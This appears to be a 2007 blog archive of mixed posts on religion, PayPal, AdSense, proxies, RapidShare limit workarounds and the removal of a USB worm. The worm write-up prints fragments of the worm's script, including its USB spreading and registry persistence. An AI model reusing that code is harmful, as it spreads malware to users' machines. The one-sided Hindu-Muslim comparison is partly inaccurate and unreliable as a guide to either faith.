Sunday, November 18, 2007

Basic Beliefs of Hindus and Muslims

Basic Beliefs of Hindus and Muslims
side by side


In Islam, belief in One God is the most important belief. Allah in arabic refers to the One God. It is a known fact that every language has one or more terms that are used in reference to God and sometimes to lesser deities. This is not the case with Allah. Allah is the personal name of the One true God. Nothing else can be called Allah. The term has no plural or gender. This shows its uniqueness when compared with the word god which can be made plural, gods, or feminine, goddess. It is interesting to notice that Allah is the personal name of God in Aramaic, the language of Jesus and a sister language of Arabic. The One true God is a reflection of the unique concept that Islam associates with God. To a Muslim, Allah is the Almighty, Creator and Sustainer of the universe, Who is similar to nothing and nothing is comparable to Him.
Islam exhorts man to consider himself and his surroundings as examples of Divine Creation rather than as divinity itself. Muslims therefore believe that everything is God’s i.e. the word ‘God’ with an apostrophe ‘s’. In other words the Muslims believe that everything belongs to God. The trees belong to God, the sun belongs to God, the moon belongs to God, the monkey belongs to God, the snake belongs to God, the human beings belong to God and everything in this universe belongs to God.

Thus the major difference between the Hindu and the Muslim beliefs is the difference of the apostrophe ‘s’. The Hindu says everything is God. The Muslim says everything is God’s.
Common Concept of God in Hinduism:

Hinduism is commonly perceived as a polytheistic religion. Indeed, most Hindus would attest to this, by professing belief in multiple Gods. While some Hindus believe in the existence of three gods, some believe in thousands of gods, and some others in thirty three crore i.e. 330 million Gods. However, learned Hindus, who are well versed in their scriptures, insist that a Hindu should believe in and worship only one God.

The major difference between the Hindu and the Muslim perception of God is the common Hindus’ belief in the philosophy of Pantheism. Pantheism considers everything, living and non-living, to be Divine and Sacred. The common Hindu, therefore, considers everything as God. He considers the trees as God, the sun as God, the moon as God, the monkey as God, the snake as God and even human beings as manifestations of God!

In Islam, all humans are created equal. For example, there is no superiority of an Arab over a non-Arab, or vice versa. Blacks and whites have no superiority over each other. The same holds with any other nationality or ethnicity. Islam rejects characterizing God in any human form or depicting Him as favoring certain individuals or nations on the basis of wealth, power or race. He created the human beings as equals. They may distinguish themselves and get His favor through virtue and piety only.
Hinduism has a caste system, with four major castes. Members of each are required by strict religious laws to follow certain hereditary occupations and to refrain from intermarriage or eating with members of the other castes. The highest, or priestly and intellectual, caste is that of the Brahmans. The remaining three in order are Kshatriya (ruling or warrior caste), Vaisya (common artisan and agricultural caste), and the Sudras (the low caste people).

Muslims eat all wholesome and good food including meat of Cow (beef), lamb, goat, and chicken.
Cow is a sacred animal and a deity for Hindus. Cows, therefore, can not be killed or eaten in Hinduism.

Muslims believe that each person has a body and soul. At death, your body is separated from your soul. Your faith and actions in this life will determine your fate in the Life After Death. There is a Day of Judgment when this life will come to an end for every one, and all humans from Adam to the last person, will be brought to a second life, rejoining of your body and soul. On that Day, God will put people in Hell or Heaven based on their beliefs and deeds of this life.
Hinduism believes in body and soul. Your soul returns to your body after your death. This cycle repeats seven times according to some. Your status or caste in next life depends on your deeds of the previous life.
This is called Reincarnation in Hinduism.

Reference: Excerpts taken from Dr. Zakir Naik's article at

Thursday, November 15, 2007

Top 10 torrent sites

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Wednesday, November 14, 2007

how to learn haking $Start$

This guide is to give you some tips, of which you may not have heard yet, and these can be useful to be on safer side when it comes to protecting yourself from hackers. Hopefully, it won’t come to a hacker getting in, but if it does…CompuWorld should NOT be held responsible

Tip 1: Hackers cover their tracks. Experienced hackers cover them more thoroughly, but amateur hackers sometimes leave things behind. Don’t expect them to leave any really big evidence behind; expect more of little things here and there you might find surprising. For example, if you’re writing a term paper and a black hat hacker accidentally saved it when he took a paragraph out- that’s suspicious. Where did that paragraph go? Well, for one thing, now you know he was in that area. Check the folders surrounding the file- you might find something.

Tip 2: Decipher between the type of hackers that are attacking you. Experienced hackers will have a more in depth look around when they penetrate your system. They won’t touch much because they know that that won’t add too much to their knowledge. But if you know a hacker’s been in, and some files are messed with, and you have a log of someone guessing passwords to a file or something of that sort, its probably some newbie who’s just starting out. These are the easiest hackers to catch. They usually get so caught up in thoughts like “I’m in!” that they forget the basics, such as work behind a proxy.

Tip 3: Don’t go crazy if you lose data. Chances are, if it was that important, you would have backed it up anyway. Most hackers nowadays wish they were back in 1989 when they could use a Black Box and having a Rainbow Book actually meant something. Most hackers aren’t blackhat, they are whitehat, and some even greyhat. But in the end, most hackers that are in systems aren’t satisfied by looking around. From past experiences, I have concluded that many hackers like to remember where have they been. So, what do they do? They either press delete here and there, or copy some files onto their systems. Stupid hackers (yes, there are plenty of stupid hackers) send files to e-mail addresses. Some free email companies will give you the IP of a certain e-mail address’s user if you can prove that user has been notoriously hacking you. But most of the time, by the time you get the e-mail ID it’s been unused for weeks if not months or years, and services like hotmail have already deleted it

Tip 4: Save information! Any information that you get from a log file (proxy server IP, things like “14P”, e-mail addresses that things were sent to, etc.) should be saved to a floppy disk (they’re not floppy anymore, I wish I could get out of the habit of calling them that) in case there’s a next time. If you get another attack, from the same proxy, or with similar e-mail addresses you can make an assumption that these hackers are the same people. In that case, it would probably be worth the effort to resolve the IP using the proxy and do a traceroute. Pressing charges is recommended if this is a repeat offender.

Tip 5: Don’t be stupid. If you’ve been hacked, take security to the next level. Hackers do talk about people they’ve hacked and they do post IPs and e-mail addresses. Proof? Take a look at Defcon Conventions. I’ve never gone to one, but I’ve seen the photos. The “Wall of Shame”-type of boards I’ve seen have IPs and e-mail addresses written all over them in fat red, dry-erase ink. Don’t be the one to go searching the Defcon website and find your e-mail address posted on the Wall of Shame board!

Tip 6: Don’t rely on luck. Chances are, sometime or another, you’re going to be targeted for an attack. Here you can rely on luck. Maybe they’ll forget? Maybe they don’t know how to do it? If you think this way, a surprise is going to hit your face very hard. Another way you could stupidly rely on luck is by saying this: It’s probably just a whitehat. On the contrary, my friend, it’s probably just a blackhat. A blackhat with knowledge stored in his head, ready to be used as an ax. It’s your data. You take the chance.

Try these links to learn some of the terms which were too goofy for your ears…
White Hat Hacker
Black Hat Hacker
Grey Hat Hacker

[hacking tips article via Computer and Sofwares]

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Proxy Servers
A proxy server is a kind of buffer between your computer and the Internet resources you are accessing. They accumulate and save files that are most often requested by thousands of Internet users in a special database, called “cache”. Therefore, proxy servers are able to increase the speed of your connection to the Internet. The cache of a proxy server may already contain information you need by the time of your request, making it possible for the proxy to deliver it immediately. The overall increase in performance may be very high. Also, proxy servers can help in cases when some owners of the Internet resources impose some restrictions on users from certain countries or geographical regions. In addition to that, among proxy servers there are so called anonymous proxy servers that hide your IP address thereby saving you from vulnerabilities concerned with it.
Anonymous Proxy Servers
Anonymous proxy servers hide your IP address and thereby prevent unauthorized access to your computer through the Internet. They do not provide anyone with your IP address and effectively hide any information about you and your reading interests. Besides that, they don’t even let anyone know that you are surfing through a proxy server. Anonymous proxy servers can be used for all kinds of Web-services, such as Web-Mail (MSN Hot Mail, Yahoo mail), web-chat rooms, FTP archives, etc.
Why Should You Use Anonymous Proxy Servers?
Any web resource you access can gather personal information about you through your unique IP address – your ID in the Internet. They can monitor your reading interests, spy upon you and, according to some policies of the Internet resources, deny accessing any information you might need.
You might become a target for many marketers and advertising agencies who, having information about your interests and knowing your IP address as well as your e-mail, will be able to send you regularly their spam and junk e-mails.

A web site can automatically exploit security holes in your system using not-very-complex, ready-made, free hacking programs. Some of such programs may just hang your machine, making you reboot it, but other, more powerful ones, can get access to the content of your hard drive or RAM. Everything a web site may need for that is only your IP address and some information about your operating system.

Using an anonymous proxy server you don't give anybody any chance to find out your IP address and any information about you and use them in their own interests.

The Solution
Using an anonymous proxy server you don’t give anybody chance to find out your IP address to use it in their own interests. We can offer you three ways to solve your IP problem:
1. Secure Tunnel - pay proxy server with plenty of features. Effective for personal use, when your Internet activities are not involved in web site development, mass form submitting, etc. The best solution for most of Internet users. Ultimate protection of privacy - nobody can find out where you are engaged in surfing. Blocks all methods of tracking. Provides an encrypted connection for all forms of web browsing, including http, news, mail, and the especially vulnerable IRC and ICQ. Comes with special totally preconfigured software.

2. ProxyWay Pro - multifunctional anonymous proxy surfing software which you can use together with a wide variety of web applications (web browsers, Instant Messengers, Internet Relay Chat (IRC), etc.) to ensure your anonymity. ProxyWay Pro provides an extended proxy management system that enables you to search for, check proxy (multithreaded proxies checking), analyze, validate proxy servers for speed, anonymity, type (HTTP/HTTPS/SOCKS), geographical location, create proxy chains. Allows update proxy list automatically using scheduler. ProxyWay Pro lets you clear history, block ads and popups, change User-Agent and Referrer fields, block harm code and much more. Also it can be used as a simple local proxy server.

3. The default small proxy list is also a good place to start with if you are a novice.

Sunday, November 11, 2007

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Know more about paypal

5 Tools Every PayPal User Should Know About
Started in 1998, PayPal has become the top online payment system with 100 million account members. If you have an account with them, here are 5 useful PayPal tools that you should be aware of:

#1 - Calculate your PayPal expenses quickly with P-Calc

Depending on the type of account and business you do with PayPal, it may impose a small charge on received funds. Although minimal, these charges can be a bit hard to calculate. P-Calc is a free service which lets you work out all those charges up front - With this, you can better price your products to ensure you reap a certain net amount.

#2 - Withdraw funds from ANY country with VMI

As with many countries, PayPal, unfortunately does not support Malaysian banks in its system yet. Hence, there is no direct way to convert your virtual funds into cold hard cash.

The Virtual Money International ATM card (which I use) is a popular legal workaround to this problem. It registers your details under a US bank which you can then transfer PayPal funds to. After which you can withdraw the funds from your local ATM machine.

I’ve been using this for a few months now, and have had no problems thus far. If you want to know more about how to use this card - check out HongKiat’s great post on this subject.

#3 - Add an extra level of security with a PayPal Security Key

As a service, PayPal is pretty secure, but passwords can fall into the wrong hands all too often!

Most websites keep your online account safe by only asking for your user name and password to verify your identity. The PayPal Security Key is a small electronic device that generates a unique security code for your account about every 30 seconds. You use that code to access your account, and to help prevent people that you don’t know from doing the same. It’s like a combination lock for your account, except that the combination always changes.

Currently only available in the US, it is being offered at a heavily subsidized price of USD$5.00 (waived for business accounts) - with replacement units being offered at the same price. A small amount to pay for guaranteed safe transactions.

#4 - Allow people to PayPal money to you from your blog
Steve Pavlina is one of the best known bloggers writing about personal development. What he revealed was that donations made up a significant portion of his online income.

“My second biggest income stream is actually donations. My average donation is about $10, and I?ve received a number of $100 donations too. It only took me about an hour to set this up via PayPal. So even if your content is free like mine, give your visitors a means to voluntarily contribute if they wish. It?s win-win.

If you?re going to request donations, then really request donations. Don?t put up a barely visible ?Donate? link and pray for the best.” - Steve Pavlina

Want to easily place PayPal donation link in your site? There are a few easy ways to go about this…

Go to PayPal and set up a standard checkout system - this is painful as the guide for the ‘easy’ standard checkout is 126 pages long.
Try out Wordpress widgets by Patrick Chia or Supriyadi which allows you to have an easy donation widget in your sidebar
Try out the popular ‘Buy me a beer’ Wordpress plugin which asks for donations, but is phrased differently.
#5 - Settle meal tabs with the PayPal Facebook app
Looking for an easier way to get your friends to pay you back? PayPal for Facebook lets you request money from your friends with just a few clicks. Currently released and still under heavy development for new features, it’s one of the more useful Facebook apps to have around.

Bonus Tip: Filter Paypal imposters from your email for free with Iconix anti Phishing tools.

Hailed by the legendary Warrior Forum leaders as a “must-read”, it’s a FREE 50-page ebook that explains why PayPal freezes so many accounts, how to avoid it, and what to do if it happens to you.

Details and free download from


Thursday, November 8, 2007


Definitions of Nirvana on the Web:

In Buddhism, it is basically a blissful spiritual condition where the heart extinguishes passion, hatred and delusion. ...

(Sans.) According to the Orientalists, the entire "blowing-out," like the flame of a candle, the utter extinction of existence. ...

in Hindu theory, a condition of happiness arising out of the absolute cessation of desire.

Is a state of peace and enlightenment that involves being unaware of one’s self. It is a freedom from desire and the sufferings desire causes. Nirvana can be attained by following the eightfold path.

Lit. Blowing out. Buddhist term for the 'exti nction' of the ego leading to enlightenment.

blown out or extinguished as in the case of a lamp. Nirvana is generally used to refer to a material life that has been extinguished, ie for one who has achieved freedom from re-birth. The term nirvana is commonly used in Buddhism as the final stage a practitioner strives for. ...

the state of peace and happiness in achieving freedom from the endless cycles of reincarnation. A state of freedom from pain, worry, and the external world.

[from nir out, away + vana blown from the verbal root va to blow] Blown out, blown away; the monad's freeing itself of the chains of all its inferior parts, so it can enter into relatively perfect wisdom and peace. It thus is, for the time, living in its own spiritual essence, a jivanmukta. ...

(Skt.): The state of peace transcending the misery of samsara; the goal of a practitioner seeking one's own personal liberation. Nirvana is not a synonym for enlightenment in the mahayana system.

“extinction” – the soteriological goal of Buddhism; the final cessation of rebirth into suffering existence.

(Sanskrit= ) Nibbána (qv).

from the root 'nirva', to blow out, extinguish. Hence, when all desires and passions are extinguished the highest bliss or beatitude, reunion with the Supreme Spirit, may be experienced.

The Buddhist state of enlightenment, a state of tranquility. (p. 181)

liberation; final emancipation

Sanskrit; literally, "extinction, blowing out"; the goal of spiritual practice in Buddhism; liberation from the cycle of rebirth and suffering.

the state of enlightenment, in which the causes of rebirth are eliminated;

Considered as the goal of Theravada Buddhist practice, it is the liberation from suffering and departure from the endless cyclic existence.

Emancipated; etherean heavens; beyond the earth's heavens; the higher heavens.

Buddha's remarks about nirvana, there is a unborn, an unoriginated, an unmade, an uncompounded and it lies beyond the the experience of the senses. A state of peace an reality. ...

Buddhist term for self-realization.

Literally blowing out; state to which a Buddhist aspires as the best attainable.

A Hindu concept of God-realization, self-realization, or illumination of the consciousness.

extinction of karma and rebirth

A blissful state associated with having achieved unity with the Divine. See also Samaddhi.

(S): Transcendence of suffering; cessation of birth in Samsara.

(Hinduism and Buddhism) the beatitude that transcends the cycle of reincarnation; characterized by the extinction of desire and suffering and individual consciousness
Eden: any place of complete bliss and delight and peace

' (Devanagari , Pali: Nibbāna निब्बान -- Chinese: 涅槃; Pinyin: nièpán, Japanese: 涅槃, nehan, Korean: 열반, yeol-bhan, Thai: Nibpan' นิพพาน ), is a Sanskrit word that literally means extinction (as in a candle flame) and/or extinguishing (i.e. of the passions).

Nirvana was an American rock band originating from Aberdeen, Washington. With the lead single "Smells Like Teen Spirit" from their 1991 album Nevermind, Nirvana exploded into the mainstream, bringing along with it a subgenre of alternative rock called "grunge". ... (band)

Nirvana is a science fiction movie, produced in Italy in 1997 by director Gabriele Salvatores, starring Christopher Lambert, Diego Abatantuono and Stefania Rocca. (film)

Nirvana is a 1995 New Age song written and composed by Rojotua, Loxatus and C. Max and performed by the Spanish musical group Elbosco. The song became a world success and was also used by Danny Boyle in the 2004 film Millions. (song)

Nirvana is a "best-of" compilation album from the American grunge band, Nirvana. It was released in October 2002. (album)

Nirvana is a UK-based progressive rock band formed in 1967, primarily active in the late 1960s and early 1970s - and still sporadically active to the present day. (UK band)

"Nirvana" is a single by Elemeno P released in 2002. The lyrics reference the grunge band Nirvana and their frontman Kurt Cobain's suicide with the lines "I like Nirvana/It doesn't mean I'll shoot myself". (Elemeno P)

Nirvana is a leafhopper genus belonging to the Nirvaninae subfamily and the tribe Nirvanini. Distinguishable from other leafhopper subfamilies by their uniquely shaped head and the presence of two preapical cells alone on the tegemen, they comprise some of the most beautiful and iridescent of ... (leafhopper)

Nirvana is the 15th episode of the US Television show Diagnosis Murder. It originally aired on April 8 1994 on CBS. (Diagnosis Murder episode)

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Wednesday, November 7, 2007

Get Paid for Your Blogs

Easy monetizing of your blog with AdSense
Why should I monetize my website?
The more success you have with your blog / website, the more time and money you're going to invest to update it and host it properly.

At some point you may think: wouldn't it just be nice to have my site pay for itself?

Well, that is actually easier to achieve than it sounds! A decent hosting plan should cost you no more than $6.95/month. However, that's quite a low figure here and most people make many many times more than that in ad revenue...

By properly monetizing your blog site it is actually possible to have it pay, not only for the hosting, but also for the time you spend working on it.

Why AdSense?
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How do I get started?
It's as simple as that:

Sign up for AdSense. It's totally free! Then follow the provided instructions to put a little javascript snippet onto your blog skin or any web page you like. You may use our b2evolution AdSense plugin to make this even easier.
When visitors view your site they see contextual text ads that automatically adjust to the contents of each page / blog post so that they are always relevant. No flashing images, just relevant text links! :)
When a visitor clicks on an ad link, Google records the click and you get paid for it. Get ready for a monthly check from Google ;)
Will it ruin my blog design?
You can choose the exact position and colors of the text ad blocks you place on your site.

Below are two examples of blogs that incorporate text ads and successfully pay for themselves. Judge for yourself:

Example 1: Ad links at the end of the blog post.
Example 2: Ad links at the top of the page.
Note: as you can see, AdSense is not limited to English!
Mini FAQ
Google has an extensive FAQ about this program. Here's our additional mini FAQ about integrating AdSense with your blog. Feel free to contact François for further information.

How do I integrate AdSense into my blog?

Try the AdSense plugin for b2evolution!

How do I integrate AdSense into my blog without the plugin?

You just copy/paste the AdSense code from Google into your blog template.

The short answer is that the template is located in /skins/skin-name/_main.php (b2evo 1.x) or /skins/skin-name/index.main.php (b2evo 2.x)

More info about skins & the main template »

b2evolution is maintained by François Planque / The Evo Factory · Contact · Team

Monday, November 5, 2007

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Method your rapid share link 2.then click on free.3.As soon as timer start type this in address bar and click enterjavascript:alert(c=0)4.a pop up message will come click ok your counter is zero just download the stu mega upload Links, Download, Rapid share Links, rapid share movies, rapid share free, hack rapid share, hack mega upload.
Method 2.Delete the cookies in your browser internet explorer or Firefox or opera or whatever u use).2.Press start->run,type cmd.3.In the command prompt,type ipconfig/flushdns press enter.Then type ipconfig/release,then ipconfig/renew .Now type exit.4.Now try downloading, for many people this may work if their ISP provides a dynamic ip.mega upload Links, Download, Rapid share Links, rapid share movies, rapid share free, hack rapid share, hack mega upload.
Method 3.Just switch off your router or modem) and switch it back on.2.This may work for some users Mtnl and Bsnl) and maybe some others too.Actually these methods generally work for those people whose ISP gives them dynamic ip.If these don't work then one more thing that can be done is to use proxies.mega upload Links, Download, Rapid share Links, rapid share movies, rapid share free, hack rapid share, hack mega upload.Method 41.Download the software Hide ip platinum from here 2.Run it, then it will automatically chose a proxy (ip of a different country) for you. So you can easily download without any restrictions. You just have to change the proxy each time you download.mega upload Links, Download, Rapid share Links, rapid share movies, rapid share free, hack rapid share, hack mega upload.MEGA UPLOADmega upload Links, Download, Rapid share Links, rapid share movies, rapid share free, hack rapid share, hack mega upload.
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How to kill Orkut worm?

Yesterday, my friend Rishi gave me a usb disk and asked me to copy some movies and music into the disk. I took it home and plugged the USB into my system and scanned it with nod32. I detected some viruses which it removed successfully, least I knew that there was another worm which didn’t get detected and it was in to infect my system. I double clicked the USB drive and nothing happened. Hmm strange.. I right clicked and opened the USB drive and found there was no content. Autoplay appears only if there is a Autorun.inf file present in the root of the drive. I didn’t care it much and closed the window to copy data into the drive later.I wanted to check my mail so ran my beloved browser Firefox, it opened and with in couple of seconds a message box popped up which said ” “I DNT HATE MOZILLA BUT USE IE OR ELSE…” and the header read “USE INTERNET EXPLORER YOU DOPE.” I was like what? It also terminated Firefox . This is when I remembered the Autoplay option in the usb drive. This is when I had to open Internet Explorer and Google this text and found the worm name is w32.USBWorm (it was now obvious). Next step was to search for a Removal Tool and to my amazement there was none available!! Nor I could find any information on how to remove it. I decided to give myself a try to remove this worm. I tried opening orkut and Bang another surprise. This is the message it popped up ” ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did?? ” now this is pissing me off. Now, i had no other option but to remove this worm from my system. I pressed ctrl+alt+del and found nothing suspesious there .
Lets see what this worm does
It runs a exe file which is name MicrosoftPowerpoint.exe which is located in the USB disk. The autorun.inf runs this file when double clicked. Once this program is run you are infected. It hides all your hidden folders, runs the process in the memory, makes the worm to start with windows and pops those annoying messages. This worm doesn’t destroy any system files. It just infects other USB drives and spreads to new hosts.
It’s time to KILL the Worm
I have PE Tools installed in my PC i ran to find out the running process. I went through all the process and found out that svchost.exe was the one responsible for it. Where PE tools helped me was, svchost.exe was running from a location C:\heap41a . So this is where the worm resides, hmm interesting now deleting the folder would do our task. But it was not so easy, as I terminated this process svchost.exe from the process list it would start again. So I had to boot my XP in safe mode. Why in safe mode is because in safe mode windows loads only the minimum required drivers and doesn’t load any user process, so this means the worm is not started with the windows. Now I searched the folder C:\heap41b but it was hidden. I went to Tools>folder option and select Show all files and folders and pressed ok. I refreshed the c:\ only to find that it won’t show any hidden folders. I again went to the Tools>folder and found the setting of Show all files and folders was reseted. Now how do I see the content, what I did was went to windows search and in advanced option I gave search hidden files and folders and gave svchost.exe as the search keyword. Bang it searched it, so I opened the folder to find out this file was not alone, the other files in this Folder were [offspring], 2.mp3, Icon.ico, reproduce.txt, svchost.exe, drivelist.txt, script1.txt, std.txt . Lets see the content of these text files.
[offspring] - Blank Folder
2.mp3 - A laughing sound
Icon.ico - A blank Icon file
#notrayicon#persistentArrayCount = 0Loop, Read,C:\heap41a\driveList.txt{ArrayCount += 1Array%ArrayCount% := A_LoopReadLine}dat1=%userprofile%settimer,reproduce,5000return
Loop %ArrayCount%{
element := Array%A_Index%driveget,data,Type,%element%:\ifequal,data,Removable{driveget,data1,status,%element%:\ifequal,data1,Ready{FileCopydir,C:\heap41a\offspring,%element%:\,1
CurrentVersion\policies\Explorer\Run,winlogonifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txtRegwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\
CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txtreturn
This is the file that is the culprit. The file responsible for all the annoying pop ups
ban:WinGetActiveTitle, edifinstring,ed,orkut{winclose %ed%soundplay,C:\heap41a\2.mp3msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30return}ifinstring,ed,youtube{winclose %ed%soundplay,C:\heap41a\2.mp3msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30return}ifinstring,ed,Mozilla Firefox{winclose %ed%msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE…,30return}ifwinactive ahk_class IEFrame{
ControlGetText,ed,edit1,ahk_class IEFrameifinstring,ed,orkut{winclose ahk_class IEFramesoundplay,C:\heap41a\2.mp3msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30return}ControlGetText,ed,edit2,ahk_class IEFrameifinstring,ed,orkut{winclose ahk_class IEFramesoundplay,C:\heap41a\2.mp3msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30return}ControlGetText,ed,edit3,ahk_class IEFrameifinstring,ed,orkut{winclose ahk_class IEFramesoundplay,C:\heap41a\2.mp3msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30return}ControlGetText,ed,edit4,ahk_class IEFrameifinstring,ed,orkut{winclose ahk_class IEFramesoundplay,C:\heap41a\2.mp3msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30return}ControlGetText,ed,edit1,ahk_class IEFrameifinstring,ed,youtube{winclose ahk_class IEFramesoundplay,C:\heap41a\2.mp3msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30return}ControlGetText,ed,edit2,ahk_class IEFrameifinstring,ed,youtube{winclose ahk_class IEFramesoundplay,C:\heap41a\2.mp3msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30return}ControlGetText,ed,edit3,ahk_class IEFrameifinstring,ed,youtube{winclose ahk_class IEFramesoundplay,C:\heap41a\2.mp3msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30return}ControlGetText,ed,edit4,ahk_class IEFrameifinstring,ed,youtube{winclose ahk_class IEFramesoundplay,C:\heap41a\2.mp3msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30return}
CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2Run C:\heap41a\svchost.exe C:\heap41a\script1.txtRun C:\heap41a\svchost.exe C:\heap41a\reproduce.txt
These files gave away all that this worm does, after reading the script I found out that this worm also hates Youtube lol.. Most important information it gave was the Registery Keys it modified.
These are the keys that were responsible for the hidden folder problem I faced earlier
Now to rectify this go to Start Menu>Run and type regedit . In the Registry Editor browse to this entry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL and in the “Checked all” key reset it back to 1 from 2. Now you can change the settings in the folders option. Now delete the folder C:\heap41a and clear all the key entries from this registry entry HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\
CurrentVersion\policies\Explorer\Run which says heap41a.
Now the virus infection is removed 100%. Before you are done make sure you format the usb drive it doesn’t infect other systems too.